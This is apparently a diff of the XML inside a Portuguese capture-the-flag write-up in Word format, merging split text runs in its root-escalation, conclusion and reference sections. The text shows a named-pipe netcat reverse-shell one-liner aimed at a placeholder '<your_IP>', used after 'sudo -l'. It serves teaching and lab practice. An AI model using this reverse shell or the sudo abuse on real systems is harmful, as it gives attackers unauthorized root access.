-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>root</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> flag?</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>What is the root flag?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4504,33 +3484,15 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="3"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Analisando que agora precisamos de acesso completo com root, usamos o comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para poder ver que comandos podemos usar.</w:t>
+      <w:bookmarkStart w:id="2" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="2"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Analisando que agora precisamos de acesso completo com root, usamos o comando sudo para poder ver que comandos podemos usar.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4559,25 +3521,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -l </w:t>
+        <w:t xml:space="preserve"> sudo -l </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4812,43 +3756,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Ele simplesmente nos entrega um lugar para podermos colar uma reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>shell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> simples. Podemos pegar no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>pentestmonkey</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e usar. </w:t>
+        <w:t xml:space="preserve">Ele simplesmente nos entrega um lugar para podermos colar uma reverse shell simples. Podemos pegar no pentestmonkey e usar. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4926,18 +3834,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Caso você não consiga mudar o arquivo, use um comando simples </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Caso você não consiga mudar o arquivo, use um comando simples echo</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4967,123 +3865,21 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>rm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /tmp/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>f;mkfifo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /tmp/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>f;cat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /tmp/f|/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -i 2&gt;&amp;1|nc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>your_IP</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;your_IP&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5099,25 +3895,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>new_port</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t>&lt;new_port&gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5203,193 +3981,105 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Abrindo um </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> na nova porta que você abriu, e rodando novamente o comando do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -l conseguimos o root. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_heading=h.1t3h5sf" w:colFirst="0" w:colLast="0"/>
+        <w:t xml:space="preserve">Abrindo um netcat na nova porta que você abriu, e rodando novamente o comando do sudo -l conseguimos o root. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo1"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc210330563"/>
+      <w:r>
+        <w:t>Conclusão</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Neste CTF, foi usado desde </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>scan</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, quebra de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>hash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, busca de diretório, procura por </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  até escalação de privilégio, portanto, eu recomendo muito para dar uma leve praticada e aprimorar mais um pouco suas habilidades.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc210330564"/>
+      <w:r>
+        <w:t>Referências</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="4"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Conclusão</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Neste CTF, foi usado desde </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>scan</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, quebra de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>hash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, busca de diretório, procura por </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  até</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> escalação de privilégio, portanto, eu recomendo muito para dar uma leve praticada e aprimorar mais um pouco suas habilidades.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:top w:val="nil"/>
-          <w:left w:val="nil"/>
-          <w:bottom w:val="nil"/>
-          <w:right w:val="nil"/>
-          <w:between w:val="nil"/>
-        </w:pBdr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_heading=h.4d34og8" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="5"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Referências</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5450,15 +4140,6 @@
           <w:t>https://pentestmonkey.net/</w:t>
         </w:r>
       </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5483,7 +4164,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" 